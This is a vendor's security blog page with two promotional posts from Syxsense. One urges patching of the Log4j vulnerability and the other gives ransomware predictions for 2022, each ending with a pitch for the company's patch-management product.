Yes, Log4J may be difficult to patch. Yet patching remains the best defense against it. The UK’s National Cyber Security Centre (NCSC) made that fact quite clear. In an alert, it said:

“In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable.”

The good news is that the vendor community is responding rapidly to the threat. Vendors such as IBM, Cisco, and VMware have already released patches as many of their systems have been impacted by this bug. More vendors are releasing Log4j patches every day.

Start 2022 with the Best IT Security Strategy

This means that IT departments are likely to be indulging in extensive patching of enterprise systems while they slowly get to work in 2022.

To avoid them becoming completely overwhelmed, they need the help of Syxsense. It will help them discover all impacted endpoints, test the released patches within three hours of receipt, and deploy them rapidly. Our automation features will save IT departments a great many hours, if not days.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 4, 2022
Love0
||

Ransomware Predictions for 2022

By NewsNo Comments

Ransomware Predictions for 2022

In the IT world, a new year is the time to make predictions for the coming 12 months. How is ransomware looking to evolve in 2022?

The new year is traditionally a time to consider the future and set down new goals and directions for life. In the IT world, it is also a time to make predictions for the coming 12 months.

Let’s take a look at ransomware and how it is likely to evolve. What are the ransomware predictions for 2022?

1. More Ransomware

The European Union Agency for Cybersecurity’s latest ENISA Threat Landscape report saw a distinct rise in ransomware over the past year, and expects that trend to continue, and even accelerate in 2022. With a 150% rise in 2021, that doesn’t bode well for enterprises in the coming year.

2. More High-Profile Victims

2021 saw a series of high-profile victims of ransomware. These included Colonial Pipeline, Kronos, JBS, and Kaseya. SolarWinds could perhaps be added, but it began at the tail end of 2020.

This year expect an even longer list. Ransomware has become the primary security threat for businesses. Groups like DarkSide, REvil, and BlackMatter are not only terrorizing organizations, they are getting smarter and more organized.

According to an analyst by Kela, hacking groups have formulated the ideal U.S. victim:

  • Annual revenue of at least $100 million
  • Not from verticals such as education, government, healthcare or non-profits
  • Preferred access types are VPN, remote desktop protocol (RDP), and tools from Citrix, Palo Alto Networks, VMware, Fortinet, and Cisco.

Someone on the dark web can sell access to such companies for up to $100,000. That shows you just how lucrative this criminal enterprise can be. Expect an even longer ransomware “hall of shame” in 2022.

3. Ransomware Inc.

Ransomware has morphed from a few scruffy petty thieves operating in basement or attic apartment into a series of organized crime syndicates. Not only is there strength in numbers, here are economies of scale, as well as business advantages in developing a food chain and supply chain among cybercriminals.

These days, we have the lower levels pounding away via phishing emails and other scams, hoping to burrow into some juicy target. They, in turn, sell these leads and points of access to bigger fish and so it goes. There are even hacking development communities that create new viruses, trojans, and ransomware code. It’s getting sophisticated.

4. Multi-Vector Attacks

Yes, the bad guys want a ransom. But they have moved beyond being one-trick ponies. As well as money, they threaten reputations by exposing attacks, blackmail companies about exposing corporate or personal dirty laundry, or sell intellectual property (IP) to a competitor.

The smaller hackers and hacking groups will go after the small fish. But the more organized entities will target big fish and go after them in multiple ways.

5. Protection Money

Protection money used to be a simple thing. A couple of hoods would show up, and explain that your store could get robbed, or burned to the ground – that you needed protection. If you paid them, they could ensure those things didn’t happen to you. If you refused, they would beat you up, break some windows, or torch the premises – and then widely publicize the fact in the neighborhood to instill fear.

Those same tactics are now being expanded to the virtual world. Expect to hear more about organizations paying hacking groups to be left alone. If you don’t pay Luigi, the hacker, expect phishing to ramp up, ransomware demands to come thick and fast, and havoc to reign against the enterprise.

The Best Insurance

As these trends continue and accelerate, cyber-insurance is gaining momentum. But rates continue to climb. The best insurance against ransomware is to ensure that all systems and endpoints are adequately patched by Syxsense Secure.

Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution. It also incorporates vulnerability scanning to detect weaknesses that could lead to a ransomware attack if unmitigated.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
January 3, 2022
Love0